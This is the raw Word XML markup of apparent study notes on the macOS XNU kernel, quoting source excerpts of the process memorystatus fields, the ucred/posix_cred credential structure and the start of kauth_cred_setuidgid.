        <w:t xml:space="preserve"> DIAGNOSTIC</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fdlock_pc</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4</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fdunlock_pc</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4</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SIGNAL_DEBUG</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lockpc</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8</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unsigned</w:t>
      </w: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unlockpc</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8</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IGNAL_DEBUG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DIAGNOSTIC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dispatchqueue_offset</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dispatchqueue_serialno_offset</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VM_PRESSURE_EVENTS</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeval  vm_pressure_last_notify_tstamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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CONFIG_MEMORYSTATUS</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Fields protected by proc list lock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TAILQ_ENTR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pro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p_memstat_lis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iority bucket link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memstat_stat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tat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int32_t           p_memstat_effectivepriorit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priority after transaction state accounted for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int32_t           p_memstat_requestedpriorit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active priority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memstat_dirty</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dirty stat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memstat_userdata</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user stat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64_t          p_memstat_idledeadline</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time at which process became clean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CONFIG_JETSAM</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    int32_t           p_memstat_memlimi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ached memory limit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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_FREEZE</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t          p_memstat_suspendedfootprint</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footprint at time of suspensions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NFIG_FREEZE */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRPr="00220FEC" w:rsidRDefault="00220FEC" w:rsidP="00220FEC">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8000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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CONFIG_MEMORYSTATUS */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRDefault="00220FEC" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805F86" w:rsidRDefault="00805F86" w:rsidP="00805F86">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc445313239"/>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred</w:t>
      </w:r>
      <w:r w:rsidR="003B5014">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_t</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00805F86" w:rsidRPr="00B54278" w:rsidRDefault="00B54278" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\ucred.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805F86" w:rsidRPr="00805F86" w:rsidRDefault="00805F86" w:rsidP="00805F86">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ucred </w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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In-kernel credential structure.</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Note that this structure should not be used outside the kernel, nor should</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it or copies of it be exported outside.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ucred </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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TAILQ_ENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ucred</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  cr_link</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never modify this without KAUTH_CRED_HASH_LOCK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u_long  cr_ref</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reference count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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> posix_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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The credential hash depends on everything from this point on</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see kauth_cred_get_hashkey)</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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 xml:space="preserve"> uid_t   cr_u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effective user id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uid_t   cr_ru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real user id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uid_t   cr_svu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saved user id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B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   cr_ngroups</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number of groups in advisory list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gid_t   cr_groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NGROUPS</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advisory group list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gid_t   cr_rg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real group id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gid_t   cr_svg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saved group id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870FBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uid_t   cr_gmuid</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UID for group membership purposes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B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cr_flags</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flags on credential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b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cr_posix</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> label    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_label</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MAC label */</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xml:space="preserve">/* </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NOTE: If anything else (besides the flags)</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added after the label, you must change</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB0F23" w:rsidRPr="00B54278" w:rsidRDefault="00AB0F23" w:rsidP="00AB0F23">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * kauth_cred_find().</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> au_session cr_audit</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* user auditing data */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB0F23" w:rsidRPr="00B54278" w:rsidRDefault="00AB0F23" w:rsidP="00AB0F23">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54278">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805F86" w:rsidRPr="00F12705" w:rsidRDefault="00F12705" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12705">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\kern\kern_credential.c</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kauth_cred_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kauth_cred_setuidgid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred_t cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid_t uid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gid_t g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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ucred temp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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    posix_cred_t temp_pcred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> posix_cred_get</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp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posix_cred_t p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NULLCRED_CHECK</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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pcred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> posix_cred_get</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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We don't need to do anything if the effective, real and saved</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user IDs are already the same as the user ID passed into us.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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pcred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cr_uid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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 xml:space="preserve">cr_ruid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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 xml:space="preserve">cr_svuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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 xml:space="preserve">cr_gid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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 xml:space="preserve">cr_rgid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
